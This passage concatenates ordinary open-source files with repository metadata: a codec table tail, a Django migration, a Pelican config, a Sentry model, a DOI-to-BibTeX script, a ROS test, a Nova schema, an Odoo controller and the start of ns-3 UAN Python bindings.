u'\u0428' # 0xFB -> CYRILLIC CAPITAL LETTER SHA
u'\u042d' # 0xFC -> CYRILLIC CAPITAL LETTER E
u'\u0429' # 0xFD -> CYRILLIC CAPITAL LETTER SHCHA
u'\u0427' # 0xFE -> CYRILLIC CAPITAL LETTER CHE
u'\u042a' # 0xFF -> CYRILLIC CAPITAL LETTER HARD SIGN
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
mit
|
MuckRock/muckrock
|
muckrock/accounts/migrations/0033_auto_20171103_1713.py
|
1
|
1051
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-11-03 17:13
import django.core.files.storage
from django.db import migrations, models
import easy_thumbnails.fields
class Migration(migrations.Migration):
dependencies = [
('accounts', '0032_auto_20171025_1551'),
]
operations = [
migrations.AddField(
model_name='statistics',
name='portal_agencies',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='statistics',
name='sent_communications_portal',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='statistics',
name='total_portal_tasks',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='statistics',
name='total_unresolved_portal_tasks',
field=models.IntegerField(blank=True, null=True),
),
]
|
agpl-3.0
|
40123254/cdw11-ag3
|
static/local_publishconf.py
|
31
|
1680
|
#!/usr/bin/env python
# -*- coding: utf-8 -*- #
from __future__ import unicode_literals
# This file is only used if you use `make publish` or
# explicitly specify it as your config file.
import os
import sys
sys.path.append(os.curdir)
from pelicanconf import *
# Because publishconf.py is loaded after pelicanconf.py, any variable set in both files takes the value from the later-loaded publishconf.py.
# Note: for Tipue search result links to be correct on the local site, './' must be used
SITEURL = './'
# This setting is for local static-page verification, so a relative URL is used
RELATIVE_URLS = True
# To make Tipue search usable both locally and on gh-pages, a different theme may be needed
THEME = 'theme/pelican-bootstrap3_local'
#BOOTSTRAP_THEME = 'readable'
#BOOTSTRAP_THEME = 'readable-old'
BOOTSTRAP_THEME = 'united'
#PYGMENTS_STYLE = 'paraiso-dark'
#PYGMENTS_STYLE = 'fruity'
# To stay compatible with render_math, fruity has to be dropped
PYGMENTS_STYLE = 'monokai'
FEED_ALL_ATOM = 'feeds/all.atom.xml'
CATEGORY_FEED_ATOM = 'feeds/%s.atom.xml'
DELETE_OUTPUT_DIRECTORY = True
# Following items are often useful when publishing
#DISQUS_SITENAME = "cadlabmanual"
#GOOGLE_ANALYTICS = ""
# Use the file system date of the md source files as the post date; no manual setting needed
DEFAULT_DATE = 'fs'
# Local code highlight
MD_EXTENSIONS = ['fenced_code', 'extra', 'codehilite(linenums=True)']
# To store articles under date-based paths, use:
#ARTICLE_URL = 'posts/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
#ARTICLE_SAVE_AS = 'posts/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html'
PAGE_URL = 'pages/{slug}/'
PAGE_SAVE_AS = 'pages/{slug}/index.html'
SHOW_ARTICLE_AUTHOR = True
|
agpl-3.0
|
ewdurbin/sentry
|
src/sentry/models/organizationaccessrequest.py
|
24
|
2510
|
"""
sentry.models.organizationmember
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import logging
from django.core.urlresolvers import reverse
from sentry.db.models import FlexibleForeignKey, Model, sane_repr
from sentry.utils.http import absolute_uri
class OrganizationAccessRequest(Model):
team = FlexibleForeignKey('sentry.Team')
member = FlexibleForeignKey('sentry.OrganizationMember')
class Meta:
app_label = 'sentry'
db_table = 'sentry_organizationaccessrequest'
unique_together = (('team', 'member'),)
__repr__ = sane_repr('team_id', 'member_id')
def send_request_email(self):
from sentry.utils.email import MessageBuilder
user = self.member.user
email = user.email
organization = self.team.organization
context = {
'email': email,
'name': user.get_display_name(),
'organization': organization,
'team': self.team,
'url': absolute_uri(reverse('sentry-organization-members', kwargs={
'organization_slug': organization.slug,
}) + '?ref=access-requests'),
}
msg = MessageBuilder(
subject='Sentry Access Request',
template='sentry/emails/request-team-access.txt',
html_template='sentry/emails/request-team-access.html',
context=context,
)
try:
msg.send([email])
except Exception as e:
logger = logging.getLogger('sentry.mail.errors')
logger.exception(e)
def send_approved_email(self):
from sentry.utils.email import MessageBuilder
user = self.member.user
email = user.email
organization = self.team.organization
context = {
'email': email,
'name': user.get_display_name(),
'organization': organization,
'team': self.team,
}
msg = MessageBuilder(
subject='Sentry Access Request',
template='sentry/emails/access-approved.txt',
html_template='sentry/emails/access-approved.html',
context=context,
)
try:
msg.send([email])
except Exception as e:
logger = logging.getLogger('sentry.mail.errors')
logger.exception(e)
|
bsd-3-clause
|
pfdamasceno/shakespeare
|
content_sources/doi2bib.py
|
1
|
1834
|
#modified from https://gist.github.com/zmwangx
#!/usr/bin/env python
# Take one argument--the doi, and convert it to bibtex using an API
# call to dx.doi.org.
from sys import argv
import os, re
#if argv[0].find('doi') != -1:
# # run as executable
# doi = argv[1]
#else:
# # run from python
# doi = argv[2]
doi_sub_str="dx.doi.org/"
f = open("/Users/damascus/Documents/Cloud/Dropbox/HipChat_DOIs/DOI.txt", 'r')
for line in f:
try:
doi_str = line
doi = re.split('\s', doi_str[doi_str.find(doi_sub_str)+(len(doi_sub_str)):])[0]
cmd = ('curl -sLH "Accept: text/bibliography; style=bibtex" ' +
'http://dx.doi.org/' + doi)
bib_oneliner = os.popen(cmd).read()
# convert bib_oneliner to formatted (multiline) bibtex
bib = ''
# extract type
entry_type = bib_oneliner[bib_oneliner.find('@') + 1:
bib_oneliner.find('{')]
bib += '@' + entry_type + '{' + doi + ',\n'; # use doi as cite key
# parse body
body = bib_oneliner[bib_oneliner.find(',')+2:-2] + ','
while body:
# match curly braces
left_minus_right = 0
i = 0
while True:
if body[i] == '{':
left_minus_right += 1
if body[i] == '}':
left_minus_right -= 1
if left_minus_right == 0:
# outermost level matched up, one entry finished
# advance one char for the trailing comma
i += 1
break
i += 1
bib += ' ' + body[:i+1] + '\n'
body = body[i+1:].strip()
bib += '}'
print(bib)
except:
pass
|
mit
|
citueda/pimouse_run_corridor
|
test/travis_test_wall_trace.py
|
1
|
1423
|
#!/usr/bin/env python
import unittest, rostest
import rosnode, rospy
import time
class WallTraceTest(unittest.TestCase):
def set_and_get(self,lf,ls,rs,rf):
with open("/dev/rtlightsensor0","w") as f:
f.write("%d %d %d %d\n" % (rf,rs,ls,lf))
time.sleep(0.3)
with open("/dev/rtmotor_raw_l0","r") as lf,\
open("/dev/rtmotor_raw_r0","r") as rf:
left = int(lf.readline().rstrip())
right = int(rf.readline().rstrip())
return left, right
def test_io(self):
        left, right = self.set_and_get(400,0,0,100) #total: 500
self.assertTrue(left == right == 0,"can't stop")
left, right = self.set_and_get(0,5,1000,0) #side direction is not a trigger of stop
self.assertTrue(left == right != 0,"stop wrongly by side sensors")
left, right = self.set_and_get(0,10,0,0) #curve to left
self.assertTrue(left < right, "don't curve to left")
left, right = self.set_and_get(0,200,0,0) #curve to right
self.assertTrue(left > right, "don't curve to right")
left, right = self.set_and_get(0,5,0,0) # don't control when far from a wall
self.assertTrue(0 < left == right, "curve wrongly")
if __name__ == '__main__':
time.sleep(3)
rospy.init_node('travis_test_wall_trace')
rostest.rosrun('pimouse_run_corridor','travis_test_wall_trace',WallTraceTest)
|
mit
|
kimjaejoong/nova
|
nova/api/openstack/compute/schemas/v3/server_groups.py
|
65
|
1564
|
# Copyright 2014 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.validation import parameter_types
# NOTE(russellb) There is one other policy, 'legacy', but we don't allow that
# being set via the API. It's only used when a group gets automatically
# created to support the legacy behavior of the 'group' scheduler hint.
SUPPORTED_POLICIES = ['anti-affinity', 'affinity']
create = {
'type': 'object',
'properties': {
'server_group': {
'type': 'object',
'properties': {
'name': parameter_types.name,
'policies': {
'type': 'array',
'items': [{'enum': SUPPORTED_POLICIES}],
'uniqueItems': True,
'additionalItems': False,
}
},
'required': ['name', 'policies'],
'additionalProperties': False,
}
},
'required': ['server_group'],
'additionalProperties': False,
}
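# Illustrative request body accepted by the schema above (assumed example, not part
# of the original file):
#   {"server_group": {"name": "my-group", "policies": ["anti-affinity"]}}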
|
apache-2.0
|
OCA/e-commerce
|
website_sale_attribute_filter_category/controllers/main.py
|
2
|
1312
|
# Copyright 2019 Tecnativa - Sergio Teruel
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl).
from odoo.addons.website_sale.controllers.main import WebsiteSale
from odoo import _, http
class ProductAttributeCategory(WebsiteSale):
@http.route()
def shop(self, page=0, category=None, search='', ppg=False, **post):
response = super(ProductAttributeCategory, self).shop(
page=page, category=category, search=search, ppg=ppg, **post)
# Re-order attributes by their category sequence
response.qcontext['attributes'] = (
response.qcontext['attributes'].sorted(
lambda x: (x.category_id.sequence, x.id)))
        # Load all categories, and add a "False" category for attributes that
        # have no category, so they are displayed under the 'Undefined' category
categories = [(False, _('Undefined'), True)]
categories.extend(
(x.id,
x.name,
x.website_folded
) for x in response.qcontext['attributes'].mapped('category_id'))
response.qcontext['attribute_categories'] = categories
response.qcontext['filtered_products'] = False
if search or post.get('attrib', False):
response.qcontext['filtered_products'] = True
return response
|
agpl-3.0
|
TakashiSasaki/ns-3-nat
|
src/uan/bindings/modulegen__gcc_LP64.py
|
24
|
494820
|
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.uan', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## address.h (module 'network'): ns3::Address [class]
module.add_class('Address', import_from_module='ns.network')
## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration]
module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'], import_from_module='ns.network')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## buffer.h (module 'network'): ns3::Buffer [class]
module.add_class('Buffer', import_from_module='ns.network')
## buffer.h (module 'network'): ns3::Buffer::Iterator [class]
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::Buffer'])
## packet.h (module 'network'): ns3::ByteTagIterator [class]
module.add_class('ByteTagIterator', import_from_module='ns.network')
## packet.h (module 'network'): ns3::ByteTagIterator::Item [class]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagIterator'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList [class]
module.add_class('ByteTagList', import_from_module='ns.network')
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class]
module.add_class('Iterator', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::ByteTagList::Iterator'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## device-energy-model-container.h (module 'energy'): ns3::DeviceEnergyModelContainer [class]
module.add_class('DeviceEnergyModelContainer', import_from_module='ns.energy')
## energy-model-helper.h (module 'energy'): ns3::DeviceEnergyModelHelper [class]
module.add_class('DeviceEnergyModelHelper', allow_subclassing=True, import_from_module='ns.energy')
## energy-model-helper.h (module 'energy'): ns3::EnergySourceHelper [class]
module.add_class('EnergySourceHelper', allow_subclassing=True, import_from_module='ns.energy')
## event-id.h (module 'core'): ns3::EventId [class]
module.add_class('EventId', import_from_module='ns.core')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
module.add_class('Ipv4Address', import_from_module='ns.network')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class]
module.add_class('Ipv4Mask', import_from_module='ns.network')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
module.add_class('Ipv6Address', import_from_module='ns.network')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class]
module.add_class('Ipv6Prefix', import_from_module='ns.network')
## net-device-container.h (module 'network'): ns3::NetDeviceContainer [class]
module.add_class('NetDeviceContainer', import_from_module='ns.network')
## node-container.h (module 'network'): ns3::NodeContainer [class]
module.add_class('NodeContainer', import_from_module='ns.network')
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## object.h (module 'core'): ns3::ObjectDeleter [struct]
module.add_class('ObjectDeleter', import_from_module='ns.core')
## object-factory.h (module 'core'): ns3::ObjectFactory [class]
module.add_class('ObjectFactory', import_from_module='ns.core')
## packet-metadata.h (module 'network'): ns3::PacketMetadata [class]
module.add_class('PacketMetadata', import_from_module='ns.network')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [struct]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
## packet-metadata.h (module 'network'): ns3::PacketMetadata::Item [enumeration]
module.add_enum('', ['PAYLOAD', 'HEADER', 'TRAILER'], outer_class=root_module['ns3::PacketMetadata::Item'], import_from_module='ns.network')
## packet-metadata.h (module 'network'): ns3::PacketMetadata::ItemIterator [class]
module.add_class('ItemIterator', import_from_module='ns.network', outer_class=root_module['ns3::PacketMetadata'])
## packet.h (module 'network'): ns3::PacketTagIterator [class]
module.add_class('PacketTagIterator', import_from_module='ns.network')
## packet.h (module 'network'): ns3::PacketTagIterator::Item [class]
module.add_class('Item', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagIterator'])
## packet-tag-list.h (module 'network'): ns3::PacketTagList [class]
module.add_class('PacketTagList', import_from_module='ns.network')
## packet-tag-list.h (module 'network'): ns3::PacketTagList::TagData [struct]
module.add_class('TagData', import_from_module='ns.network', outer_class=root_module['ns3::PacketTagList'])
## uan-mac-rc.h (module 'uan'): ns3::Reservation [class]
module.add_class('Reservation')
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter> [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Object', 'ns3::ObjectBase', 'ns3::ObjectDeleter'], parent=root_module['ns3::ObjectBase'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simulator.h (module 'core'): ns3::Simulator [class]
module.add_class('Simulator', destructor_visibility='private', import_from_module='ns.core')
## tag.h (module 'network'): ns3::Tag [class]
module.add_class('Tag', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
## tag-buffer.h (module 'network'): ns3::TagBuffer [class]
module.add_class('TagBuffer', import_from_module='ns.network')
## uan-prop-model.h (module 'uan'): ns3::Tap [class]
module.add_class('Tap')
## traced-value.h (module 'core'): ns3::TracedValue<double> [class]
module.add_class('TracedValue', import_from_module='ns.core', template_parameters=['double'])
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## uan-address.h (module 'uan'): ns3::UanAddress [class]
module.add_class('UanAddress')
## uan-address.h (module 'uan'): ns3::UanAddress [class]
root_module['ns3::UanAddress'].implicitly_converts_to(root_module['ns3::Address'])
## uan-helper.h (module 'uan'): ns3::UanHelper [class]
module.add_class('UanHelper')
## uan-tx-mode.h (module 'uan'): ns3::UanModesList [class]
module.add_class('UanModesList')
## uan-transducer.h (module 'uan'): ns3::UanPacketArrival [class]
module.add_class('UanPacketArrival')
## uan-prop-model.h (module 'uan'): ns3::UanPdp [class]
module.add_class('UanPdp')
## uan-phy.h (module 'uan'): ns3::UanPhyListener [class]
module.add_class('UanPhyListener', allow_subclassing=True)
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode [class]
module.add_class('UanTxMode')
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode::ModulationType [enumeration]
module.add_enum('ModulationType', ['PSK', 'QAM', 'FSK', 'OTHER'], outer_class=root_module['ns3::UanTxMode'])
## uan-tx-mode.h (module 'uan'): ns3::UanTxModeFactory [class]
module.add_class('UanTxModeFactory')
## vector.h (module 'core'): ns3::Vector2D [class]
module.add_class('Vector2D', import_from_module='ns.core')
## vector.h (module 'core'): ns3::Vector3D [class]
module.add_class('Vector3D', import_from_module='ns.core')
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## int64x64-double.h (module 'core'): ns3::int64x64_t [class]
module.add_class('int64x64_t', import_from_module='ns.core')
## acoustic-modem-energy-model-helper.h (module 'uan'): ns3::AcousticModemEnergyModelHelper [class]
module.add_class('AcousticModemEnergyModelHelper', parent=root_module['ns3::DeviceEnergyModelHelper'])
## chunk.h (module 'network'): ns3::Chunk [class]
module.add_class('Chunk', import_from_module='ns.network', parent=root_module['ns3::ObjectBase'])
## header.h (module 'network'): ns3::Header [class]
module.add_class('Header', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
## object.h (module 'core'): ns3::Object [class]
module.add_class('Object', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
## object.h (module 'core'): ns3::Object::AggregateIterator [class]
module.add_class('AggregateIterator', import_from_module='ns.core', outer_class=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::RandomVariableStream [class]
module.add_class('RandomVariableStream', import_from_module='ns.core', parent=root_module['ns3::Object'])
## random-variable-stream.h (module 'core'): ns3::SequentialRandomVariable [class]
module.add_class('SequentialRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::EventImpl', 'ns3::empty', 'ns3::DefaultDeleter<ns3::EventImpl>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::NixVector', 'ns3::empty', 'ns3::DefaultDeleter<ns3::NixVector>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::Packet', 'ns3::empty', 'ns3::DefaultDeleter<ns3::Packet>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## nstime.h (module 'core'): ns3::Time [class]
module.add_class('Time', import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time::Unit [enumeration]
module.add_enum('Unit', ['S', 'MS', 'US', 'NS', 'PS', 'FS', 'LAST'], outer_class=root_module['ns3::Time'], import_from_module='ns.core')
## nstime.h (module 'core'): ns3::Time [class]
root_module['ns3::Time'].implicitly_converts_to(root_module['ns3::int64x64_t'])
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## trailer.h (module 'network'): ns3::Trailer [class]
module.add_class('Trailer', import_from_module='ns.network', parent=root_module['ns3::Chunk'])
## random-variable-stream.h (module 'core'): ns3::TriangularRandomVariable [class]
module.add_class('TriangularRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## uan-header-common.h (module 'uan'): ns3::UanHeaderCommon [class]
module.add_class('UanHeaderCommon', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcAck [class]
module.add_class('UanHeaderRcAck', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCts [class]
module.add_class('UanHeaderRcCts', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcCtsGlobal [class]
module.add_class('UanHeaderRcCtsGlobal', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcData [class]
module.add_class('UanHeaderRcData', parent=root_module['ns3::Header'])
## uan-header-rc.h (module 'uan'): ns3::UanHeaderRcRts [class]
module.add_class('UanHeaderRcRts', parent=root_module['ns3::Header'])
## uan-mac.h (module 'uan'): ns3::UanMac [class]
module.add_class('UanMac', parent=root_module['ns3::Object'])
## uan-mac-aloha.h (module 'uan'): ns3::UanMacAloha [class]
module.add_class('UanMacAloha', parent=root_module['ns3::UanMac'])
## uan-mac-cw.h (module 'uan'): ns3::UanMacCw [class]
module.add_class('UanMacCw', parent=[root_module['ns3::UanMac'], root_module['ns3::UanPhyListener']])
## uan-mac-rc.h (module 'uan'): ns3::UanMacRc [class]
module.add_class('UanMacRc', parent=root_module['ns3::UanMac'])
## uan-mac-rc.h (module 'uan'): ns3::UanMacRc [enumeration]
module.add_enum('', ['TYPE_DATA', 'TYPE_GWPING', 'TYPE_RTS', 'TYPE_CTS', 'TYPE_ACK'], outer_class=root_module['ns3::UanMacRc'])
## uan-mac-rc-gw.h (module 'uan'): ns3::UanMacRcGw [class]
module.add_class('UanMacRcGw', parent=root_module['ns3::UanMac'])
## uan-noise-model.h (module 'uan'): ns3::UanNoiseModel [class]
module.add_class('UanNoiseModel', parent=root_module['ns3::Object'])
## uan-noise-model-default.h (module 'uan'): ns3::UanNoiseModelDefault [class]
module.add_class('UanNoiseModelDefault', parent=root_module['ns3::UanNoiseModel'])
## uan-phy.h (module 'uan'): ns3::UanPhy [class]
module.add_class('UanPhy', parent=root_module['ns3::Object'])
## uan-phy.h (module 'uan'): ns3::UanPhy::State [enumeration]
module.add_enum('State', ['IDLE', 'CCABUSY', 'RX', 'TX', 'SLEEP'], outer_class=root_module['ns3::UanPhy'])
## uan-phy.h (module 'uan'): ns3::UanPhyCalcSinr [class]
module.add_class('UanPhyCalcSinr', parent=root_module['ns3::Object'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrDefault [class]
module.add_class('UanPhyCalcSinrDefault', parent=root_module['ns3::UanPhyCalcSinr'])
## uan-phy-dual.h (module 'uan'): ns3::UanPhyCalcSinrDual [class]
module.add_class('UanPhyCalcSinrDual', parent=root_module['ns3::UanPhyCalcSinr'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyCalcSinrFhFsk [class]
module.add_class('UanPhyCalcSinrFhFsk', parent=root_module['ns3::UanPhyCalcSinr'])
## uan-phy-dual.h (module 'uan'): ns3::UanPhyDual [class]
module.add_class('UanPhyDual', parent=root_module['ns3::UanPhy'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyGen [class]
module.add_class('UanPhyGen', parent=root_module['ns3::UanPhy'])
## uan-phy.h (module 'uan'): ns3::UanPhyPer [class]
module.add_class('UanPhyPer', parent=root_module['ns3::Object'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerGenDefault [class]
module.add_class('UanPhyPerGenDefault', parent=root_module['ns3::UanPhyPer'])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerUmodem [class]
module.add_class('UanPhyPerUmodem', parent=root_module['ns3::UanPhyPer'])
## uan-prop-model.h (module 'uan'): ns3::UanPropModel [class]
module.add_class('UanPropModel', parent=root_module['ns3::Object'])
## uan-prop-model-ideal.h (module 'uan'): ns3::UanPropModelIdeal [class]
module.add_class('UanPropModelIdeal', parent=root_module['ns3::UanPropModel'])
## uan-prop-model-thorp.h (module 'uan'): ns3::UanPropModelThorp [class]
module.add_class('UanPropModelThorp', parent=root_module['ns3::UanPropModel'])
## uan-transducer.h (module 'uan'): ns3::UanTransducer [class]
module.add_class('UanTransducer', parent=root_module['ns3::Object'])
## uan-transducer.h (module 'uan'): ns3::UanTransducer::State [enumeration]
module.add_enum('State', ['TX', 'RX'], outer_class=root_module['ns3::UanTransducer'])
## uan-transducer-hd.h (module 'uan'): ns3::UanTransducerHd [class]
module.add_class('UanTransducerHd', parent=root_module['ns3::UanTransducer'])
## random-variable-stream.h (module 'core'): ns3::UniformRandomVariable [class]
module.add_class('UniformRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::WeibullRandomVariable [class]
module.add_class('WeibullRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::ZetaRandomVariable [class]
module.add_class('ZetaRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## random-variable-stream.h (module 'core'): ns3::ZipfRandomVariable [class]
module.add_class('ZipfRandomVariable', import_from_module='ns.core', parent=root_module['ns3::RandomVariableStream'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
